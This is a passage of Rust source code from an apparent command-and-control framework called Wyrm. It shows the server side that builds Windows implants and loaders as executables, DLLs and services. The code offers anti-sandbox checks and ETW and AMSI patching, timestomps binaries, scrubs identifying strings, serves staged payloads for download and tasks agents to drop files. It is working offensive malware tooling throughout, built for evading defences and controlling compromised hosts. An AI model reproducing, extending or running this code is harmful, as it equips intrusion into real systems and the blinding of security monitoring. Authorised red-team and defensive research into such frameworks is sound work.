    let data: NewAgentStaging = match profile.as_staged_agent(implant_profile_name, StageType::All)
    {
        WyrmResult::Ok(d) => d,
        WyrmResult::Err(e) => {
            let _ = remove_dir(&save_path).await?;
            let msg = format!("Error constructing a NewAgentStaging. {e:?}");
            log_error_async(&msg).await;
            return Err(msg);
        }
    };

    //
    // For every build type, build it - we manually specify the loop size here so as more
    // build options are added, the loop will need to be increased to accommodate.
    //
    for i in 0..3 {
        let stage_type = match i {
            0 => StageType::Exe,
            1 => StageType::Dll,
            2 => StageType::Svc,
            _ => unreachable!(),
        };

        // An Err here means the build command could not even be spawned
        let cmd_build_output = compile_loader(&data, stage_type, dll_path).await;
        if let Err(e) = cmd_build_output {
            let msg = &format!("Failed to build loader. {e}");
            let _ = remove_dir(&save_path).await?;
            return Err(msg.to_owned());
        }

        // A non-zero exit status means cargo ran but compilation failed
        let output = cmd_build_output.unwrap();
        if !output.status.success() {
            let msg = &format!(
                "Failed to build loader. {:#?}",
                String::from_utf8_lossy(&output.stderr),
            );

            let _ = remove_dir(&save_path).await?;

            return Err(msg.to_owned());
        }

        //
        // Move the built implant to where the operator requested it to be built in
        //
        // On non-Windows hosts the cross-compile target dir is nested one level deeper
        let src_dir = if cfg!(windows) {
            PathBuf::from(format!("./loader/target/release"))
        } else {
            PathBuf::from(format!("./loader/target/x86_64-pc-windows-msvc/release"))
        };

        let out_dir = Path::new(&save_path);
        let src = match stage_type {
            StageType::Dll => src_dir.join("loader.dll"),
            StageType::Exe => src_dir.join("loader.exe"),
            StageType::Svc => src_dir.join("loader_svc.exe"),
            StageType::All => unreachable!(),
        };

        // Format each output file name as loader_{profile name from toml}
        let ldr_name_fmt = format!("loader_{}", data.pe_name);
        let mut dest = out_dir.join(ldr_name_fmt);

        // NOTE(review): the service build gets a `.svc` extension even though
        // the source artefact is `loader_svc.exe` — confirm this is intended.
        if !(match stage_type {
            StageType::Dll => dest.add_extension("dll"),
            StageType::Exe => dest.add_extension("exe"),
            StageType::Svc => dest.add_extension("svc"),
            StageType::All => unreachable!(),
        }) {
            let msg = format!("Failed to add extension to local file. {dest:?}");
            let _ = remove_dir(&save_path).await?;

            return Err(msg);
        };

        // Error check..
        if let Err(e) = tokio::fs::rename(&src, &dest).await {
            let cwd = current_dir().expect("could not get cwd");
            let msg = format!(
                "Failed to rename built loader - it is *possible* you interrupted the request/page, looking for: {}, to rename to: {}. Cwd: {cwd:?} {e}",
                src.display(),
                dest.display()
            );
            let _ = remove_dir(&save_path).await?;

            return Err(msg);
        };

        // Apply relevant transformations to the loader too
        post_process_pe_on_disk(&dest, &data, stage_type).await;
    }

    Ok(())
}

/// Runs a cargo build of the loader crate for the given stage type.
///
/// Profile options are passed to the loader's build script via environment
/// variables; on a non-Windows host the build cross compiles with `cargo-xwin`
/// for the MSVC target.
///
/// # Errors
/// `StageType::All` is rejected, and spawn failures of the build command are
/// surfaced. A build that runs but fails is reported via the `Output` status.
async fn compile_loader(
    data: &NewAgentStaging,
    stage_type: StageType,
    dll_path: &Path,
) -> Result<std::process::Output, std::io::Error> {
    // The loader must be built as one concrete artefact kind
    if stage_type == StageType::All {
        return Err(io::Error::other("StageType::All not supported"));
    }

    // Which cargo target to build for the requested artefact
    let build_as_flags = match stage_type {
        StageType::Dll => vec!["--lib"],
        StageType::Exe => vec!["--bin", "loader"],
        StageType::Svc => vec!["--bin", "loader_svc"],
        StageType::All => vec![],
    };

    // Fold the profile's opted-in feature flags into one comma separated
    // `--features` argument; no features selected means no argument at all.
    let mut feature_csv = String::new();
    for (enabled, feature) in [
        (data.antisandbox_ram, "sandbox_mem,"),
        (data.antisandbox_trig, "sandbox_trig,"),
        (data.patch_etw, "patch_etw,"),
    ] {
        if enabled {
            feature_csv.push_str(feature);
        }
    }

    let features: Vec<String> = if feature_csv.is_empty() {
        vec![]
    } else {
        vec!["--features".to_string(), feature_csv]
    };

    // Non-Windows hosts cross compile with cargo-xwin for the MSVC target
    let (mut cmd, target) = if cfg!(windows) {
        (tokio::process::Command::new("cargo"), None)
    } else {
        (
            tokio::process::Command::new("cargo-xwin"),
            Some("x86_64-pc-windows-msvc"),
        )
    };

    let exports = parse_exports_to_string_for_env(&data.exports);

    // The loader's build script reads its configuration from these env vars
    cmd.current_dir("./loader")
        .env("SVC_NAME", data.svc_name.clone())
        .env("EXPORTS_JMP_WYRM", exports.export_only_jmp_wyrm)
        .env("EXPORTS_USR_MACHINE_CODE", exports.export_machine_code)
        .env("EXPORTS_PROXY", exports.export_proxy)
        .env("DLL_PATH", dll_path)
        .env("MUTEX", &data.mutex.clone().unwrap_or_default());

    cmd.arg("build");

    if let Some(t) = target {
        cmd.args(["--target", t]);
    }

    cmd.arg("--release");
    cmd.args(build_as_flags).args(features);

    cmd.output().await
}

/// Builds the specified agent as a PE.
///
/// The implant crate is compiled with `cargo` (or `cargo-xwin` when cross
/// compiling from a non-Windows host), with the profile's configuration passed
/// to the implant's build via environment variables.
///
/// # Important
/// The PE name passed into this function should NOT include its extension.
///
/// # Errors
/// Returns an `io::Error` when `stage_type` is `StageType::All`, or when the
/// build command cannot be spawned. A build that runs but fails compilation is
/// reported through the returned `Output`'s exit status, not as an `Err`.
pub async fn compile_agent(
    data: &NewAgentStaging,
    stage_type: StageType,
) -> Result<std::process::Output, std::io::Error> {
    // `All` is a meta stage type used when expanding a profile; each concrete
    // artefact must be requested individually.
    if stage_type == StageType::All {
        return Err(io::Error::other("StageType::All not supported"));
    }

    // Ensure the output name carries the extension matching the stage type
    let pe_name = validate_extension(&data.pe_name, stage_type);

    // Check for any feature flags
    let features: Vec<String> = {
        let mut builder = vec!["--features".to_string()];
        let mut string_builder = String::new();

        if data.antisandbox_ram {
            string_builder.push_str("sandbox_mem,");
        }
        if data.antisandbox_trig {
            string_builder.push_str("sandbox_trig,");
        }
        if data.patch_etw {
            string_builder.push_str("patch_etw,");
        }
        if data.patch_amsi {
            string_builder.push_str("patch_amsi,");
        }

        // No features selected -> omit the `--features` flag entirely
        if !string_builder.is_empty() {
            builder.push(string_builder);
            builder
        } else {
            vec![]
        }
    };

    let build_as_flags = match stage_type {
        StageType::Dll => vec!["--lib"],
        StageType::Exe => vec!["--bin", "implant"],
        StageType::Svc => vec!["--bin", "implant_svc"],
        StageType::All => vec![],
    };

    //
    // Now we want to actually build the agent itself. We will do this on the C2, building the
    // agent via the local command shell.
    //
    // As operators shouldn't be doing this frequently, I can't see much harm in terms of CPU and
    // memory, but this may need to be profiled.
    //
    // We are also relying on the C2 being run from the correct point as pathing here is going to be
    // relative to allow flexibility on server installations. The C2 must run from the c2 crate directly
    // for the pathing to work.
    //

    let toolchain = "nightly";
    // Non-Windows hosts cross compile for the MSVC Windows target
    let target = if cfg!(windows) {
        None
    } else {
        Some("x86_64-pc-windows-msvc")
    };

    let mut cmd = if !cfg!(windows) {
        tokio::process::Command::new("cargo-xwin")
    } else {
        tokio::process::Command::new("cargo")
    };

    let default_spawn_as = data.default_spawn_as.clone().unwrap_or_default();

    // Comma separated list of the profile's check-in URIs
    let c2_endpoints = data
        .c2_endpoints
        .iter()
        .map(|e| e.to_string() + ",")
        .collect::<String>();

    let jitter = data.jitter.unwrap_or_default();

    let exports = parse_exports_to_string_for_env(&data.exports);
    // Semicolon separated list of WOF folders rooted at WOFS_PATH, if any
    let wofs = match &data.wofs {
        Some(w) => w
            .iter()
            .map(|folder| format!("{}/{folder};", WOFS_PATH))
            .collect::<String>(),
        None => String::new(),
    };

    // The implant's build script consumes its configuration via these env vars
    cmd.env("RUSTUP_TOOLCHAIN", toolchain)
        .current_dir("./implant")
        .env("AGENT_NAME", &data.implant_name)
        .env("PE_NAME", pe_name)
        .env("DEF_SLEEP_TIME", data.default_sleep_time.to_string())
        .env("C2_HOST", &data.c2_address)
        .env("C2_URIS", c2_endpoints)
        .env("C2_PORT", data.port.to_string())
        .env("JITTER", jitter.to_string())
        .env("SVC_NAME", data.svc_name.clone())
        .env("USERAGENT", &data.useragent)
        .env("STAGING_URI", &data.staging_endpoint)
        .env("EXPORTS_JMP_WYRM", exports.export_only_jmp_wyrm)
        .env("EXPORTS_USR_MACHINE_CODE", exports.export_machine_code)
        .env("EXPORTS_PROXY", exports.export_proxy)
        .env("SECURITY_TOKEN", &data.agent_security_token)
        .env("STAGE_TYPE", format!("{stage_type}"))
        .env("DEFAULT_SPAWN_AS", default_spawn_as)
        .env("WOF", wofs)
        .env("MUTEX", &data.mutex.clone().unwrap_or_default());

    cmd.arg("build");

    if let Some(t) = target {
        cmd.args(["--target", t]);
    }

    // Debug builds keep symbols; everything else is built --release
    if !data.build_debug {
        cmd.arg("--release");
    }

    cmd.args(build_as_flags).args(features);

    cmd.output().await
}

/// Applies on-disk post-processing to a freshly built PE at `dest`.
///
/// Depending on the profile this will: timestomp the binary's compile date,
/// scrub the embedded `implant.dll` string from DLL builds, and remove or
/// replace operator defined strings. Each failure is logged and does not stop
/// the remaining transforms.
pub async fn post_process_pe_on_disk(dest: &Path, data: &NewAgentStaging, stage_type: StageType) {
    // Timestomp the compile date if requested; a bad file must not silently
    // ship, so failures are at least logged.
    if let Some(ts) = data.timestomp.as_ref() {
        if let Err(e) = timestomp_binary_compile_date(ts, &dest).await {
            log_error_async(&format!("Could not timestomp binary {}, {e}", dest.display())).await;
        }
    }

    // DLL builds carry the literal "implant.dll\0" - scrub it out
    if stage_type == StageType::Dll {
        if let Err(e) = scrub_strings(&dest, b"implant.dll\0", None).await {
            log_error_async(&format!("Failed to scrub implant.dll. {e}")).await;
        }
    }

    // Operator defined string stomping: removals first, then replacements
    let Some(stomp) = &data.string_stomp else {
        return;
    };

    for needle in stomp.remove.iter().flatten() {
        if let Err(e) = scrub_strings(&dest, needle.as_bytes(), None).await {
            log_error_async(&format!(
                "Failed to scrub string {needle} from {}. {e}",
                dest.display()
            ))
            .await;
        }
    }

    for (needle, repl) in stomp.replace.iter().flatten() {
        if let Err(e) = scrub_strings(&dest, needle.as_bytes(), Some(repl.as_bytes())).await {
            log_error_async(&format!(
                "Failed to replace string {needle} from {}. {e}",
                dest.display()
            ))
            .await;
        }
    }
}

/// Builds the named implant profile for every stage type (exe, dll, svc),
/// moving each built PE into `save_path` and post-processing it (timestomp /
/// string scrubbing). For DLL builds the matching loader is built as well via
/// `write_loader_to_tmp`.
///
/// # Errors
/// Returns a human readable error; `save_path` is removed before an error is
/// returned. NOTE(review): if that cleanup itself fails, the `?` on
/// `remove_dir` returns the cleanup error in place of the original one.
pub async fn write_implant_to_tmp_folder<'a>(
    profile: &Profile,
    save_path: &'a PathBuf,
    implant_profile_name: &str,
    state: State<Arc<AppState>>,
) -> Result<(), String> {
    //
    // Transform the profile into a valid `NewAgentStaging`
    //
    let data: NewAgentStaging = match profile.as_staged_agent(implant_profile_name, StageType::All)
    {
        WyrmResult::Ok(d) => d,
        WyrmResult::Err(e) => {
            let _ = remove_dir(&save_path).await?;
            let msg = format!("Error constructing a NewAgentStaging. {e:?}");
            log_error_async(&msg).await;
            return Err(msg);
        }
    };

    //
    // For every build type, build it - we manually specify the loop size here so as more
    // build options are added, the loop will need to be increased to accommodate.
    //
    for i in 0..3 {
        let stage_type = match i {
            0 => StageType::Exe,
            1 => StageType::Dll,
            2 => StageType::Svc,
            _ => unreachable!(),
        };

        // Actually try build with cargo
        let cmd_build_output = compile_agent(&data, stage_type).await;

        // An Err here means the build command could not even be spawned
        if let Err(e) = cmd_build_output {
            let msg = &format!("Failed to build agent. {e}");
            let _ = remove_dir(&save_path).await?;
            return Err(msg.to_owned());
        }

        // A non-zero exit status means cargo ran but compilation failed
        let output = cmd_build_output.unwrap();
        if !output.status.success() {
            let msg = &format!(
                "Failed to build agent. {:#?}",
                String::from_utf8_lossy(&output.stderr),
            );

            let _ = remove_dir(&save_path).await?;

            return Err(msg.to_owned());
        }

        //
        // Move the built implant to where the operator requested it to be built in
        //
        // cargo writes to target/debug or target/release depending on the profile
        let dir_name = {
            match data.build_debug {
                true => "debug",
                false => "release",
            }
        };

        // On non-Windows hosts the cross-compile target dir is nested one level deeper
        let src_dir = if cfg!(windows) {
            PathBuf::from(format!("./implant/target/{dir_name}"))
        } else {
            PathBuf::from(format!(
                "./implant/target/x86_64-pc-windows-msvc/{dir_name}"
            ))
        };

        let out_dir = Path::new(&save_path);
        let src = match stage_type {
            StageType::Dll => src_dir.join("implant.dll"),
            StageType::Exe => src_dir.join("implant.exe"),
            StageType::Svc => src_dir.join("implant_svc.exe"),
            StageType::All => unreachable!(),
        };

        let mut dest = out_dir.join(&data.pe_name);

        // NOTE(review): the service build gets a `.svc` extension even though
        // the source artefact is `implant_svc.exe` — confirm this is intended.
        if !(match stage_type {
            StageType::Dll => dest.add_extension("dll"),
            StageType::Exe => dest.add_extension("exe"),
            StageType::Svc => dest.add_extension("svc"),
            StageType::All => unreachable!(),
        }) {
            let msg = format!("Failed to add extension to local file. {dest:?}");
            let _ = remove_dir(&save_path).await?;

            return Err(msg);
        };

        // Error check..
        if let Err(e) = tokio::fs::rename(&src, &dest).await {
            let cwd = current_dir().expect("could not get cwd");
            let msg = format!(
                "Failed to rename built agent - it is *possible* you interrupted the request/page, looking for: {}, to rename to: {}. Cwd: {cwd:?} {e}",
                src.display(),
                dest.display()
            );
            let _ = remove_dir(&save_path).await?;

            return Err(msg);
        };

        //
        // Update state to include a new endpoint for the listeners
        //
        if let Err(e) = is_download_staging_url_error(&data, &state).await {
            let msg = format!(
                "The download URL matches an existing one, or a URL which is used for agent check-in, \
                this is not permitted. Kind: {e:?}"
            );
            let _ = remove_dir(&save_path).await?;

            return Err(msg);
        }

        post_process_pe_on_disk(&dest, &data, stage_type).await;

        //
        // Build the loader for the DLL
        //
        if stage_type == StageType::Dll {
            let p = format!("{}/{}.dll", FULLY_QUAL_PATH_TO_FILE_BUILD, data.pe_name);
            let dll_path = PathBuf::from(p);

            // NOTE(review): a missing DLL hard panics the C2 rather than
            // returning an Err like every other failure path — confirm intended.
            if !dll_path.exists() {
                panic!(
                    "DLL path for the raw binary did not exist. This is not acceptable. Expected path: {}",
                    dll_path.display()
                );
            }

            write_loader_to_tmp(profile, save_path, implant_profile_name, &dll_path).await?;
        }
    }

    Ok(())
}

/// Validates the extension of the build target matches that expected by the operator
/// after building takes place.
///
/// Any known extension (`.dll`, `.exe`, `.svc`) already present on `name` is
/// stripped before the correct extension for `expected_type` is appended, so a
/// profile name of `foo.exe` staged as a DLL becomes `foo.dll` (and `foo.dll`
/// stays `foo.dll` rather than becoming `foo.dll.dll`).
///
/// # Panics
/// Panics (via `unreachable!`) for `StageType::All`, which is not a concrete
/// build target.
fn validate_extension(name: &String, expected_type: StageType) -> String {
    // NOTE: `String::replace` returns a *new* string rather than mutating in
    // place, so the previous `let _ = new_name.replace(..)` pattern silently
    // discarded its result. Strip any known extension explicitly instead.
    let stem = name
        .strip_suffix(".dll")
        .or_else(|| name.strip_suffix(".exe"))
        .or_else(|| name.strip_suffix(".svc"))
        .unwrap_or(name);

    let extension = match expected_type {
        StageType::Dll => ".dll",
        StageType::Exe => ".exe",
        StageType::Svc => ".svc",
        StageType::All => unreachable!(),
    };

    format!("{stem}{extension}")
}

/// Prints an error to the C2 console and returns a formatted error.
///
/// **IMPORTANT**: This function will also delete the staged_agent row from the database by it's `implant_name`.
async fn stage_new_agent_error_printer(
    message: &str,
    uri: &str,
    state: State<Arc<AppState>>,
) -> Option<Value> {
    log_error_async(message).await;

    // Best effort removal of the partially staged row; the error we are about
    // to hand back is more useful to the operator than a delete failure.
    let _ = state.db_pool.delete_staged_resource_by_uri(uri).await;

    let wyrm_err = WyrmResult::Err::<String>(message.to_string());
    Some(serde_json::to_value(wyrm_err).unwrap())
}

/// Stages a file uploaded to the C2 by an admin which will be made available for public download
/// at a specified API endpoint.
///
/// The uploaded bytes are written to `FILE_STORE_PATH/<download_name>`, a row
/// is inserted into the staged-agent table, and the download endpoint is added
/// to the in-memory endpoint list.
///
/// # Returns
/// A serialised `WyrmResult` describing success or failure.
pub async fn stage_file_upload_from_users_disk(
    data: FileUploadStagingFromClient,
    state: State<Arc<AppState>>,
) -> Option<Value> {
    let out_dir = Path::new(FILE_STORE_PATH);
    let dest = out_dir.join(&data.download_name);

    // Persist the uploaded bytes into the public file store
    if let Err(e) = fs::write(&dest, &data.file_data).await {
        let serialised = serde_json::to_value(WyrmResult::Err::<String>(format!(
            "Failed to write file on C2: {e:?}",
        )))
        .unwrap();

        return Some(serialised);
    }

    // Wrap the file metadata in the same staging shape used for built agents
    let agent_stage_template =
        NewAgentStaging::from_staged_file_metadata(&data.api_endpoint, &data.download_name);

    //
    // Try insert into the database, following that, deconflict the download URI and add it into the in-memory
    // list.
    //
    // NOTE(review): if this insert fails, the file written above is left on
    // disk — confirm whether it should be cleaned up here.
    if let Err(e) = state.db_pool.add_staged_agent(&agent_stage_template).await {
        log_error_async(&format!("Failed to insert row in db: {e:?}")).await;
        let serialised = serde_json::to_value(WyrmResult::Err::<String>(format!(
            "Failed to insert row in db for new staged agent: {e:?}",
        )))
        .unwrap();

        return Some(serialised);
    };

    // NOTE(review): the helper's parameter is named `uri` but receives the
    // download_name here — confirm `delete_staged_resource_by_uri` keys on it.
    if let Err(e) = add_api_endpoint_for_staged_resource(&agent_stage_template, state.clone()).await
    {
        return stage_new_agent_error_printer(
            &format!(
                "The download URL matches an existing one, or a URL which is used for agent \
                check-in, this is not permitted. Kind: {e:?}"
            ),
            &data.download_name,
            state,
        )
        .await;
    };

    let serialised = match serde_json::to_value(WyrmResult::Ok(format!(
        "File successfully uploaded, and is being served at /{}. File name: {}",
        data.api_endpoint, data.download_name,
    ))) {
        Ok(s) => s,
        Err(e) => {
            return stage_new_agent_error_printer(
                &format!("Failed to serialise response. {e}"),
                &data.download_name,
                state,
            )
            .await;
        }
    };

    Some(serialised)
}


================================================
FILE: c2/src/admin_task_dispatch/mod.rs
================================================
use std::{
    path::{Path, PathBuf},
    sync::Arc,
};

use crate::{
    DB_EXPORT_PATH, FILE_STORE_PATH,
    app_state::{AppState, DownloadEndpointData},
    logging::{log_error, log_error_async},
};
use axum::extract::State;
use chrono::{SecondsFormat, Utc};
use serde_json::Value;
use shared::tasks::{
    Command, DELIM_FILE_DROP_METADATA, FileDropMetadata, NewAgentStaging, WyrmResult,
};
use shared_c2_client::{AgentC2MemoryNotifications, MapToMitre, TaskExport};
use tokio::{fs, io::AsyncWriteExt};

pub mod dispatch_table;
mod execute;
pub mod implant_builder;

/// Recursively removes the given directory, logging and returning the error
/// message if the removal fails.
async fn remove_dir(save_path: impl AsRef<Path>) -> Result<(), String> {
    match fs::remove_dir_all(save_path).await {
        Ok(()) => Ok(()),
        Err(e) => {
            let msg = format!("Failed to remove directory for tmp after building profiles. {e}");
            log_error_async(&msg).await;
            Err(msg)
        }
    }
}

/// Removes the given file, logging and returning the error message if the
/// removal fails.
async fn remove_file(file_path: impl AsRef<Path>) -> Result<(), String> {
    match fs::remove_file(file_path.as_ref()).await {
        Ok(()) => Ok(()),
        Err(e) => {
            let msg = format!("Failed to remove file for tmp.7z after building profiles. {e}");
            log_error_async(&msg).await;
            Err(msg)
        }
    }
}

/// Builds a tab separated summary line, staleness flag, and pending
/// notifications for every connected agent, serialised for the client.
async fn list_agents(state: State<Arc<AppState>>) -> Option<Value> {
    let snapshot = state.connected_agents.snapshot_agents().await;
    let mut summaries: Vec<AgentC2MemoryNotifications> = Vec::with_capacity(snapshot.len());

    for agent in snapshot {
        let checkin = agent
            .last_checkin_time
            .to_rfc3339_opts(chrono::SecondsFormat::Secs, true);

        let line = format!(
            "\t{}\t\t{}\t{}\t{}",
            agent.uid, checkin, agent.first_run_data.b, agent.first_run_data.c,
        );

        // Pulling also marks the notifications as read on the db side
        let pending = pull_notifications_for_agent(agent.uid.clone(), state.clone()).await;
        summaries.push((line, agent.is_stale, pending));
    }

    Some(serde_json::to_value(&summaries).expect("could not serialise"))
}

/// Inserts a new task for the agent where the format of the task metadata is already valid. This function is
/// just a wrapper for a database interaction.
///
/// # Returns
/// None - the task is queued and the resulting data can be made available with the 'n' function on the cli.
async fn task_agent<T: Into<String>>(
    command: Command,
    metadata: Option<T>,
    uid: String,
    state: State<Arc<AppState>>,
) -> Option<Value> {
    // Normalise the generic metadata down to a concrete String for the db
    let metadata: Option<String> = metadata.map(Into::into);

    state
        .db_pool
        .add_task_for_agent_by_id(&uid, command, metadata)
        .await
        .unwrap();

    None
}

/// Inserts a new task in the db instructing the agent to alter its sleep time. This will also be reflected in the
/// agent's metadata on the agent db entry for persistence.
async fn task_agent_sleep(time: i64, uid: String, state: State<Arc<AppState>>) -> Option<Value> {
    // Persist the new sleep time on the agent row first so it survives restarts
    state
        .db_pool
        .update_agent_sleep_time(&uid, time)
        .await
        .unwrap();

    // Then queue the sleep task itself, carrying the time as its metadata
    state
        .db_pool
        .add_task_for_agent_by_id(&uid, Command::Sleep, Some(time.to_string()))
        .await
        .unwrap();

    // We dont have any metadata to send back to the client, so an empty vec is sufficient
    None
}

/// Queries the database for the pending notifications for a given agent, and then marks them as pulled.
///
/// # Returns
/// - `Some(Value)`: the serialised notifications that were pending
/// - `None`: either no notifications were pending, or the db query failed (the
///   failure is logged server-side)
async fn pull_notifications_for_agent(uid: String, state: State<Arc<AppState>>) -> Option<Value> {
    // The db call marks the pulled notifications as complete as a side effect,
    // so all that remains here is to serialise whatever it hands back. (The
    // previous version also collected `completed_id`s into a vec that was
    // never read - dead code, now removed.)
    match state.db_pool.pull_notifications_for_agent(&uid).await {
        Ok(notifications) => notifications.map(|n| serde_json::to_value(&n).unwrap()),
        Err(e) => {
            log_error_async(&format!(
                "Could not pull notifications for agent {uid}. {e}"
            ))
            .await;
            None
        }
    }
}

/// Returns the time of the server in UTC
///
/// On the (unlikely) event the timestamp cannot be serialised, a serialised
/// error string is returned instead so the client always receives a value.
fn show_server_time() -> Option<Value> {
    let now = Utc::now().to_rfc3339_opts(SecondsFormat::Secs, true);

    let value = serde_json::to_value(&now).unwrap_or_else(|e| {
        serde_json::to_value(format!("Failed to serialise server time. {e}")).unwrap()
    });

    Some(value)
}

/// Lists staged resources on the C2, such as staged agents.
///
/// Always returns `Some`, carrying either a `WyrmResult::Ok` with the staged data or a
/// `WyrmResult::Err` with the (logged) db error text.
async fn list_staged_resources(state: State<Arc<AppState>>) -> Option<Value> {
    let staged = state.db_pool.get_staged_agent_data().await;

    let results = match staged {
        Ok(data) => WyrmResult::Ok(data),
        Err(e) => {
            log_error_async(&format!("Failed to list resources: {e:?}")).await;
            WyrmResult::Err(e.to_string())
        }
    };

    Some(serde_json::to_value(results).unwrap())
}

/// Deletes a staged resource from the database by its internal stage name
async fn delete_staged_resources(
    state: State<Arc<AppState>>,
    download_endpoint: String,
) -> Option<Value> {
    // Delete from db
    let results = state
        .db_pool
        .delete_staged_resource_by_uri(&download_endpoint)
        .await
        .unwrap();

    {
        // remove the download stage from the in memory list
        let mut lock = state.endpoints.write().await;
        lock.download_endpoints.remove(&download_endpoint);
    }

    // Delete from disk
    let mut file_to_delete = PathBuf::from(FILE_STORE_PATH);
    file_to_delete.push(results);
    tokio::fs::remove_file(&file_to_delete).await.unwrap();

    let ser = serde_json::to_value(()).unwrap();

    Some(ser)
}

/// Removes an agent, by name, from the in-memory list of connected agents. There is no
/// metadata to return to the client.
async fn remove_agent_from_list(state: State<Arc<AppState>>, agent_name: String) -> Option<Value> {
    let agents = &state.connected_agents;
    agents.remove_agent(&agent_name).await;

    None
}

/// Error state which could occur when trying to add a stage or file to the C2
#[derive(Debug)]
enum StageError {
    /// The proposed URI collides with an existing download endpoint
    EndpointExistsDownload,
    /// The proposed URI collides with an existing agent check-in (C2) endpoint
    EndpointExistsCheckIn,
}

/// Adds an API endpoint for public use on the C2 which relates to a custom file / a new agent uploaded
/// by the admin on the client.
///
/// Deconfliction is performed first, ensuring the new endpoint does not duplicate or clash with
/// existing ones; only then is the endpoint inserted into the in-memory structures.
///
/// This function does **not** handle database insertions, and assumes they have already been done /
/// will be done hereafter.
///
/// # Returns
/// - `Ok`: If successful, unit Ok is returned
/// - `Err`: If there is an error adding a URI, the error is returned as a [`StageError`]
async fn add_api_endpoint_for_staged_resource(
    data: &NewAgentStaging,
    state: State<Arc<AppState>>,
) -> Result<(), StageError> {
    // Check we don't overlap incompatible URI's
    is_download_staging_url_error(data, &state).await?;

    let endpoint_data = DownloadEndpointData::new(&data.pe_name, &data.implant_name, None);

    state
        .endpoints
        .write()
        .await
        .download_endpoints
        .insert(data.staging_endpoint.clone(), endpoint_data);

    Ok(())
}

/// Checks whether a staged URI exists in a way which is incompatible. For example, you cannot have two
/// download URI's that overlap, and you cannot have a checkin URI overlapping with a download URI.
///
/// # Returns
/// - `Ok(())`: no conflicts were found
/// - `Err(StageError)`: describes which kind of endpoint the proposed URI collides with
async fn is_download_staging_url_error(
    data: &NewAgentStaging,
    state: &State<Arc<AppState>>,
) -> Result<(), StageError> {
    let server_endpoints = state.endpoints.read().await;

    // Check for conflicts between the proposed C2 check-in endpoints and the existing
    // download endpoints
    if data
        .c2_endpoints
        .iter()
        .any(|e| server_endpoints.download_endpoints.contains_key(e))
    {
        return Err(StageError::EndpointExistsDownload);
    }

    // Check the existing C2 endpoints with the proposed staging endpoint (only in the case
    // where the operator is building manually as opposed to the profile). Building via the profile
    // currently results in an empty string "", which is why we do this check.
    if !data.staging_endpoint.is_empty()
        && server_endpoints
            .c2_endpoints
            .contains(&data.staging_endpoint)
    {
        return Err(StageError::EndpointExistsCheckIn);
    }

    // Finally, the proposed staging endpoint must not collide with an existing download endpoint
    if server_endpoints
        .download_endpoints
        .contains_key(&data.staging_endpoint)
    {
        return Err(StageError::EndpointExistsDownload);
    }

    Ok(())
}

/// Handler for instructing the agent to drop a file to disk.
async fn drop_file_handler(
    uid: Option<String>,
    mut data: FileDropMetadata,
    state: State<Arc<AppState>>,
) -> Option<Value> {
    // The metadata fields must not contain the wire delimiter; reject the request if any do
    let uri = data.download_uri.as_deref().unwrap_or_default();
    let has_delim = data.download_name.contains(DELIM_FILE_DROP_METADATA)
        || data.internal_name.contains(DELIM_FILE_DROP_METADATA)
        || uri.contains(DELIM_FILE_DROP_METADATA);

    if has_delim {
        let err = WyrmResult::Err::<String>(format!(
            "Content cannot contain {DELIM_FILE_DROP_METADATA}"
        ));
        return Some(serde_json::to_value(err).unwrap());
    }

    // Resolve the staged file name to its concrete download endpoint
    let found = state
        .endpoints
        .read()
        .await
        .find_format_download_endpoint(&data.internal_name);

    let download_uri = match found {
        Some(u) => u,
        None => {
            let msg = format!(
                "Could not find staged file when instructing agent to drop a file to disk. Looking for file name: '{}' \
                but it does not exist in memory.",
                data.internal_name
            );
            log_error_async(&msg).await;
            return Some(serde_json::to_value(WyrmResult::Err::<String>(msg)).unwrap());
        }
    };

    data.download_uri = Some(download_uri);

    task_agent::<String>(Command::Drop, Some(data.into()), uid.unwrap(), state).await
}

/// Exports the completed tasks on an agent (by its ID) to a json file in the C2 filesystem
///
/// # Returns
/// - `Some(Value)`: a serialised status or error message for the client
/// - `None`: where the export file could not be written (the error is logged)
async fn export_completed_tasks_to_json(uid: String, state: State<Arc<AppState>>) -> Option<Value> {
    // Fetch the completed task data; a db error, or missing / empty data, is reported
    // back to the client as a serialised message.
    let results = match state.db_pool.get_agent_export_data(uid.as_str()).await {
        Ok(Some(r)) if !r.is_empty() => r,
        Ok(_) => {
            let msg = format!("Tasks for implant: {uid} were empty");
            log_error(&msg);
            return Some(serde_json::to_value(msg).unwrap());
        }
        Err(e) => {
            let msg = format!(
                "Error encountered for implant: {uid} when trying to fetch completed tasks. {e}"
            );
            log_error(&msg);
            return Some(serde_json::to_value(msg).unwrap());
        }
    };

    // Pair each task with its MITRE mapping before serialising
    let mut results_with_mitre: Vec<TaskExport> = Vec::with_capacity(results.len());
    for task in &results {
        results_with_mitre.push(TaskExport::new(task, task.command.map_to_mitre()));
    }

    // Serialisation failures are returned to the client as an error message rather
    // than panicking the handler task.
    let json_export = match serde_json::to_string(&results_with_mitre) {
        Ok(j) => j,
        Err(e) => {
            let msg = format!("Could not serialise db results for agent: {uid}. {e}");
            log_error(&msg);
            return Some(serde_json::to_value(msg).unwrap());
        }
    };

    //
    // Try write the data to the fs
    //
    let mut path = PathBuf::from(DB_EXPORT_PATH);
    path.push(&uid);
    path.add_extension("json");

    let mut file = match tokio::fs::OpenOptions::new()
        .write(true)
        .read(true)
        .create(true)
        .truncate(true)
        .open(&path)
        .await
    {
        Ok(f) => f,
        Err(e) => {
            let msg = format!(
                "Could not create db export file on fs for agent: {uid}. Path: {}, {e}",
                path.display()
            );
            log_error(&msg);
            return Some(serde_json::to_value(msg).unwrap());
        }
    };

    // `write_all` rather than `write`: a single `write` call may perform a partial write
    if let Err(e) = file.write_all(json_export.as_bytes()).await {
        log_error(&format!(
            "Could not write to output file {} for agent: {uid}. {e}",
            path.display()
        ));
        return None;
    };

    Some(serde_json::to_value(format!("File exported as {uid}")).unwrap())
}


================================================
FILE: c2/src/agents.rs
================================================
use std::{collections::HashMap, sync::Arc};

use axum::http::HeaderMap;
use chrono::{DateTime, Duration, Utc};
use serde::{Deserialize, Serialize};
use shared::tasks::{Command, FirstRunData, Task, tasks_contains_kill_agent};
use tokio::{sync::RwLock, time::timeout};

use crate::{db::Db, logging::log_error_async};

#[derive(Serialize, Deserialize, Clone)]
pub struct Agent {
    /// Unique identifier for the agent, as carried in its `WWW-Authenticate` request header
    pub uid: String,
    /// The agent's sleep interval between check-ins, in seconds
    pub sleep: u64,
    /// Environment data sent by the agent on its first session beacon
    pub first_run_data: FirstRunData,
    /// UTC timestamp of the agent's most recent check-in
    pub last_checkin_time: DateTime<Utc>,
